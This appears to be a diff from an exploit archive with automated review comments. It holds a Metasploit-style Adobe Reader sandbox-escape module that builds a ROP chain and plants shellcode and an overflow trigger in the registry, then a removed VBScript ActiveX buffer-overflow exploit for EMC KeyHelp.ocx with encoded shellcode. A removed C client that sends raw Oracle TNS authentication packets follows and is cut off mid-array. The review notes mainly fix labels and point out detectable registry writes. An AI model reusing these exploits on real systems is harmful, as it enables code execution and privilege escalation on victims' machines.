buf << [@gadgets['pop ecx # ret']].pack("V")
buf << data[i, 4].ljust(4,"\x00") # ecx
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
i = i + 4
end
return i
end

def create_rop_chain
mem = 0x0c0c0c0c

buf = [0x58000000 + 1].pack("V")
buf << [0x58000000 + 2].pack("V")
|
||||
buf << [0].pack("V")
|
||||
buf << [0x58000000 + 4].pack("V")
|
||||
|
||||
buf << [0x58000000 + 5].pack("V")
|
||||
buf << [0x58000000 + 6].pack("V")
|
||||
buf << [0x58000000 + 7].pack("V")
|
||||
buf << [@gadgets['ret']].pack("V")
|
||||
buf << rand_text(8)
|
||||
|
||||
# Allocate Memory To store the shellcode and the necessary data to read the
|
||||
# shellcode stored in the registry
|
||||
buf << [@addresses['VirtualAlloc']].pack("V")
|
||||
buf << [@gadgets['ret']].pack("V")
|
||||
buf << [mem].pack("V") # lpAddress
|
||||
buf << [0x00010000].pack("V") # SIZE_T dwSize
|
||||
buf << [0x00003000].pack("V") # DWORD flAllocationType
|
||||
buf << [0x00000040].pack("V") # flProtect
|
||||
|
||||
# Put in the allocated memory the necessary data in order to read the
|
||||
# shellcode stored in the registry
|
||||
# 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
|
||||
reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
|
||||
reg_key_length = store(buf, reg_key, mem)
|
||||
# 2) The reg entry: shellcode
|
||||
value_key = "shellcode\x00"
|
||||
store(buf, value_key, mem + reg_key_length)
|
||||
# 3) The output buffer size: 0x3000
|
||||
size_buffer = 0x3000
|
||||
buf << [@gadgets['pop edi # ret']].pack("V")
|
||||
buf << [mem + 0x50].pack("V") # edi
|
||||
buf << [@gadgets['pop ecx # ret']].pack("V")
|
||||
buf << [size_buffer].pack("V") # ecx
|
||||
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
|
||||
|
||||
# Copy the shellcode from the the registry to the
|
||||
# memory allocated with executable permissions and
|
||||
# ret into there
|
||||
buf << [@addresses['RegGetValueA']].pack("V")
|
||||
buf << [mem + 0x1000].pack("V") # ret to shellcode
|
||||
buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER
|
||||
buf << [mem].pack("V") # lpSubKey
|
||||
buf << [mem + 0x3c].pack("V") # lpValue
|
||||
buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY
|
||||
buf << [0].pack("V") # pdwType
|
||||
buf << [mem + 0x1000].pack("V") # pvData
|
||||
buf << [mem + 0x50].pack("V") # pcbData
|
||||
end
|
||||
|
||||
# Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
|
||||
def store_data_registry(buf)
|
||||
vprint_status("Creating the Registry Key to store the shellcode...")
|
||||
|
||||
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
|
||||
vprint_good("Registry Key created")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
|
||||
end
|
||||
|
||||
vprint_status("Storing the shellcode in the Registry...")
|
||||
|
||||
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
|
||||
vprint_good("Shellcode stored")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry")
|
||||
end
|
||||
|
||||
# Create the Malicious registry entry in order to exploit....
|
||||
vprint_status("Creating the Registry Key to trigger the Overflow...")
|
||||
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
|
||||
vprint_good("Registry Key created")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
|
||||
end
|
||||
|
||||
vprint_status("Storing the trigger in the Registry...")
|
||||
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
|
||||
vprint_good("Trigger stored")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry")
|
||||
end
|
||||
end
|
||||
|
||||
def trigger_overflow
|
||||
vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
|
||||
# Create a thread in order to execute the necessary code to launch AdobeCollabSync
|
||||
ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
|
||||
if ret['return'] < 1
|
||||
print_error("Unable to CreateThread")
|
||||
return
|
||||
end
|
||||
hthread = ret['return']
|
||||
|
||||
vprint_status("Resuming the Thread...")
|
||||
# Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
|
||||
ret = client.railgun.kernel32.ResumeThread(hthread)
|
||||
if ret['return'] < 1
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread")
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
@addresses = {}
|
||||
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
|
||||
@addresses['AcroRd32.exe'] = acrord32["return"]
|
||||
if @addresses['AcroRd32.exe'] == 0
|
||||
return Msf::Exploit::CheckCode::Unknown
|
||||
elsif check_trigger
|
||||
return Msf::Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Msf::Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
@addresses = {}
|
||||
@gadgets = {}
|
||||
|
||||
print_status("Verifying we're in the correct target process...")
|
||||
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
|
||||
@addresses['AcroRd32.exe'] = acrord32["return"]
|
||||
if @addresses['AcroRd32.exe'] == 0
|
||||
fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found")
|
||||
end
|
||||
vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")
|
||||
|
||||
print_status("Checking the AcroRd32.exe image...")
|
||||
if not check_trigger
|
||||
fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
|
||||
end
|
||||
|
||||
print_status("Checking the Process Integrity Level...")
|
||||
if not low_integrity_level?
|
||||
fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
|
||||
end
|
||||
|
||||
print_status("Collecting necessary addresses for exploit...")
|
||||
collect_addresses
|
||||
|
||||
print_status("Searching the gadgets needed to build the ROP chain...")
|
||||
search_gadgets
|
||||
print_good("Gadgets collected...")
|
||||
|
||||
print_status("Building the ROP chain...")
|
||||
buf = create_rop_chain
|
||||
print_good("ROP chain ready...")
|
||||
|
||||
print_status("Storing the shellcode and the trigger in the Registry...")
|
||||
store_data_registry(buf)
|
||||
|
||||
print_status("Executing AdobeCollabSync.exe...")
|
||||
trigger_overflow
|
||||
end
|
||||
end
|
|
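Review bot: in `search_gadgets`, the success message for the `pop ecx # ret` gadget prints the wrong label (`vprint_good("Gadget 'pop edi # ret' found at ...")` on the line that reports `@gadgets['pop ecx # ret']`); change the string to `'pop ecx # ret'` so verbose output is not misleading. Two smaller points: in `trigger_overflow`, `CreateThread` is called through `session.railgun` while `ResumeThread` goes through `client.railgun`, so pick one alias; and the `search_gadgets` offsets (`ntdll_text_base = 0x10000`, `search_length = 0xd6000`) are hard-coded with no comment on which ntdll build they were derived from, so document the expected target build next to them. From a detection standpoint the module's footprint is fully visible in this hunk: `store_data_registry` writes the `shellcode` and `bDeleteDB` values as REG_BINARY under `HKCU\Software\Adobe\Adobe Synchronizer\10.0\DBRecoveryOptions`, a concrete registry path a defender can monitor for writes.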
@ -1,60 +0,0 @@
|
|||
<!--
|
||||
EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote
|
||||
buffer overflow exploit
|
||||
(ie8 xp sp3)
|
||||
by Nine:Situations:Group::pyrokinesis
|
||||
site: http://retrogod.altervista.org/
|
||||
|
||||
tested products:
|
||||
EMC Captiva QuickScan Pro 4.6 sp1
|
||||
EMC Documentum ApllicationXtender Desktop 5.4
|
||||
and possibly other products carrying quickscan
|
||||
|
||||
|
||||
CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
|
||||
Progid: KeyHelp.KeyCtrl.1
|
||||
Binary Path: C:\WINDOWS\system32\KeyHelp.ocx
|
||||
KillBitted: False
|
||||
Implements IObjectSafety: True
|
||||
Safe For Initialization (IObjectSafety): True
|
||||
Safe For Scripting (IObjectSafety): True
|
||||
|
||||
JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow
|
||||
eip is overwritten after 537 bytes through the second argument, you can touch SEH even
|
||||
-->
|
||||
<html>
|
||||
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
|
||||
</object>
|
||||
<script language='vbscript'>
|
||||
//executing calc
|
||||
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
|
||||
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
|
||||
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
|
||||
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
|
||||
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
|
||||
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
|
||||
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
|
||||
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
|
||||
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
|
||||
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
|
||||
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
|
||||
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
|
||||
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
|
||||
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
|
||||
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
|
||||
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
|
||||
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
|
||||
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
|
||||
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
|
||||
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
|
||||
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
|
||||
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
|
||||
jnk = string(537,"A")
|
||||
eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll
|
||||
nop = string(16,unescape("%90"))
|
||||
mapID=1
|
||||
pstrChmFile= jnk + eip + nop + scode
|
||||
pstrFrame="aaaaaaaa"
|
||||
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
|
||||
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
|
||||
</script>
|
|
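Review bot: the hunk deletes the KeyHelp.ocx entry outright (60 lines removed, nothing added) and the commit message 'Updated 05_20_2014' gives no reason; record whether the entry was moved, deduplicated or retracted so the archive history stays auditable. For the record, the removed file had two markup defects visible here: the `<object ... />` tag is self-closed and then closed again with `</object>`, and `//executing calc` is a JavaScript-style comment inside a `language='vbscript'` block (VBScript comments start with `'`, as the commented-out `'KEYHELPLib.JumpMappedID` line does). The header's `KillBitted: False` together with `Safe For Scripting (IObjectSafety): True` is the configuration that lets a web page reach this control at all, and is the first thing to check on systems where the listed EMC products are installed.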
@ -1,386 +0,0 @@
|
|||
#include <winsock2.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <windows.h>
|
||||
#include <assert.h>
|
||||
|
||||
#include <string>
|
||||
|
||||
void s_send (SOCKET s, char *msg, DWORD size)
|
||||
{
|
||||
int sent;
|
||||
|
||||
printf ("s_send: begin: %d bytes\n", size);
|
||||
|
||||
sent=send (s, (char*)msg, size, 0);
|
||||
|
||||
if (sent==SOCKET_ERROR)
|
||||
{
|
||||
printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
|
||||
} else
|
||||
|
||||
if (sent!=size)
|
||||
printf ("sent only %d bytes\n", sent);
|
||||
|
||||
printf ("s_send: end\n");
|
||||
};
|
||||
|
||||
void s_recv (SOCKET s)
|
||||
{
|
||||
char buf[20000];
|
||||
int r;
|
||||
|
||||
struct timeval t;
|
||||
fd_set fd;
|
||||
|
||||
t.tv_sec=0;
|
||||
t.tv_usec=100000; // 100 ms
|
||||
|
||||
printf ("s_recv: begin\n");
|
||||
|
||||
FD_ZERO(&fd);
|
||||
FD_SET(s, &fd);
|
||||
|
||||
if (select (0, &fd, 0, 0, &t))
|
||||
// if (select (0, &fd, 0, 0, NULL))
|
||||
{
|
||||
r=recv (s, buf, 20000, 0);
|
||||
if (r!=0 && r!=-1)
|
||||
{
|
||||
printf ("got %d bytes\n", r);
|
||||
}
|
||||
else
|
||||
{
|
||||
printf ("connection lost, r=%d\n", r);
|
||||
};
|
||||
}
|
||||
else
|
||||
{
|
||||
printf ("select() returns zero\n");
|
||||
};
|
||||
};
|
||||
|
||||
unsigned char NSPTCN[]=
|
||||
{
|
||||
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
|
||||
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
|
||||
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
|
||||
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
|
||||
//^^ ^^ cmd len
|
||||
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00
|
||||
|
||||
};
|
||||
|
||||
#define NSPTCN_HEADER_LEN 58
|
||||
|
||||
unsigned char NSPTDA[]=
|
||||
{
|
||||
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
|
||||
// ^^ ^^ packet len
|
||||
0x00, 0x00
|
||||
};
|
||||
|
||||
#define NSPTDA_HEADER_LEN 10
|
||||
|
||||
void s_send_NSPTDA (SOCKET s, char *msg, int size)
|
||||
{
|
||||
char * buf;
|
||||
int sz=size + NSPTDA_HEADER_LEN;
|
||||
|
||||
buf=(char*)malloc (sz);
|
||||
|
||||
NSPTDA[0]=( sz ) >> 8;
|
||||
NSPTDA[1]=( sz ) & 0xFF;
|
||||
|
||||
memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
|
||||
memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
|
||||
|
||||
printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
|
||||
|
||||
s_send (s, (char*)buf, sz);
|
||||
|
||||
free (buf);
|
||||
};
|
||||
|
||||
void s_send_TNS_command (SOCKET s, const char *cmd)
|
||||
{
|
||||
unsigned char * pkt;
|
||||
int cmd_len=strlen (cmd);
|
||||
|
||||
printf ("sending [%s]\n", cmd);
|
||||
printf ("len: %d\n", cmd_len);
|
||||
|
||||
if (cmd_len<231)
|
||||
{
|
||||
|
||||
int str_len=strlen(cmd);
|
||||
int pkt_len=str_len+58;
|
||||
|
||||
pkt=(unsigned char*)malloc (str_len+58);
|
||||
|
||||
memcpy (pkt,
|
||||
"\x00\x00\x00\x00\x01\x00\x00\x00"
|
||||
// plenH, plenL
|
||||
"\x01\x3A\x01\x2C\x00\x41\x20\x00"
|
||||
"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
|
||||
"\x00\x00\x00\x3A\x00\x00\x02\x00"
|
||||
// cmdlenH cmdlenL
|
||||
"\x61\x61\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00", 58);
|
||||
|
||||
memcpy (pkt+58, cmd, str_len);
|
||||
|
||||
pkt[1]=pkt_len&0xFF;
|
||||
pkt[0]=(pkt_len>>8)&0xFF;
|
||||
|
||||
pkt[25]=str_len&0xFF;
|
||||
pkt[24]=(str_len>>8)&0xFF;
|
||||
|
||||
s_send (s, (char*)pkt, pkt_len);
|
||||
|
||||
free (pkt);
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
// something should be modified here in NSPTCN
|
||||
assert (0);
|
||||
};
|
||||
};
|
||||
|
||||
bool try_host (char * h)
|
||||
{
|
||||
struct hostent *hp;
|
||||
WSADATA wsaData;
|
||||
struct sockaddr_in sin;
|
||||
int r;
|
||||
struct timeval t;
|
||||
fd_set fd;
|
||||
SOCKET s;
|
||||
char pkt1318[1318];
|
||||
|
||||
WSAStartup(MAKEWORD(1, 1), &wsaData);
|
||||
|
||||
hp=gethostbyname (h);
|
||||
assert (hp!=NULL);
|
||||
|
||||
s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
|
||||
assert (s!=INVALID_SOCKET);
|
||||
|
||||
{
|
||||
u_long on=1;
|
||||
assert (ioctlsocket(s, FIONBIO, &on) != -1);
|
||||
};
|
||||
|
||||
sin.sin_family=AF_INET;
|
||||
sin.sin_port=htons(1521);
|
||||
memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
|
||||
|
||||
r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
|
||||
|
||||
t.tv_sec=3;
|
||||
t.tv_usec=0;
|
||||
|
||||
FD_ZERO(&fd);
|
||||
FD_SET(s, &fd);
|
||||
|
||||
if (select (0, 0, &fd, 0, &t))
|
||||
{
|
||||
printf ("connected to %s\n", h);
|
||||
|
||||
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
|
||||
|
||||
// waiting for NSPTRS
|
||||
|
||||
s_recv(s);
|
||||
|
||||
s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
|
||||
|
||||
// waiting for NSPTAC
|
||||
|
||||
s_recv(s);
|
||||
|
||||
// send NA packet
|
||||
|
||||
s_send (s,
|
||||
"\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
|
||||
"\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
|
||||
"\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
|
||||
"\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
|
||||
"\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
|
||||
"\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
|
||||
"\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
|
||||
"\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
|
||||
"\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
|
||||
"\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
|
||||
,156);
|
||||
|
||||
s_recv (s);
|
||||
|
||||
// send TTIPRO
|
||||
|
||||
s_send (s,
|
||||
|
||||
"\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
|
||||
"\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
|
||||
"\x2E\x31\x2E\x30\x00"
|
||||
, 37);
|
||||
|
||||
s_recv (s);
|
||||
|
||||
// send TTIDTY
|
||||
|
||||
s_send (s,
|
||||
|
||||
"\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
|
||||
"\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
|
||||
"\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
|
||||
"\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
|
||||
"\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
|
||||
, 75);
|
||||
|
||||
s_recv (s);
|
||||
|
||||
|
||||
// call OSESSKEY
|
||||
|
||||
s_send (s,
|
||||
|
||||
"\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
|
||||
"\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
|
||||
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
|
||||
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
|
||||
"\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
|
||||
"\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
|
||||
"\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
|
||||
"\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
|
||||
"\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
|
||||
"\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
|
||||
"\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
|
||||
"\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
|
||||
"\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
|
||||
"\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
|
||||
, 218);
|
||||
|
||||
// call OAUTH
|
||||
|
||||
memcpy (pkt1318,
|
||||
"\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
|
||||
"\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
|
||||
"\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
|
||||
"\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
|
||||
"\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
|
||||
"\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
|
||||
"\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
|
||||
"\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
|
||||
"\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
|
||||
"\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
|
||||
"\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
|
||||
"\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
|
||||
"\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
|
||||
"\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
|
||||
"\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
|
||||
"\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
|
||||
"\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
|
||||
"\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
|
||||
"\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
|
||||
"\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
|
||||
"\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
|
||||
"\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
|
||||
"\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
|
||||
"\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
|
||||
"\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
|
||||
"\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
|
||||
"\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
|
||||
"\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
|
||||
"\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
|
||||
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
|
||||
"\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
|
||||
"\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
|
||||
"\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
|
||||
"\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
|
||||
"\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
|
||||
"\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
|
||||
"\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
|
||||
"\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
|
||||
"\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
|
||||
"\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
|
||||
"\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
|
||||
"\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
|
||||
"\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
|
||||
"\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
|
||||
"\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
|
||||
"\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
|
||||
"\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
|
||||
"\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
|
||||
"\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
|
||||
"\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
|
||||
"\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
|
||||
"\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
|
||||
"\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
|
||||
"\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
|
||||
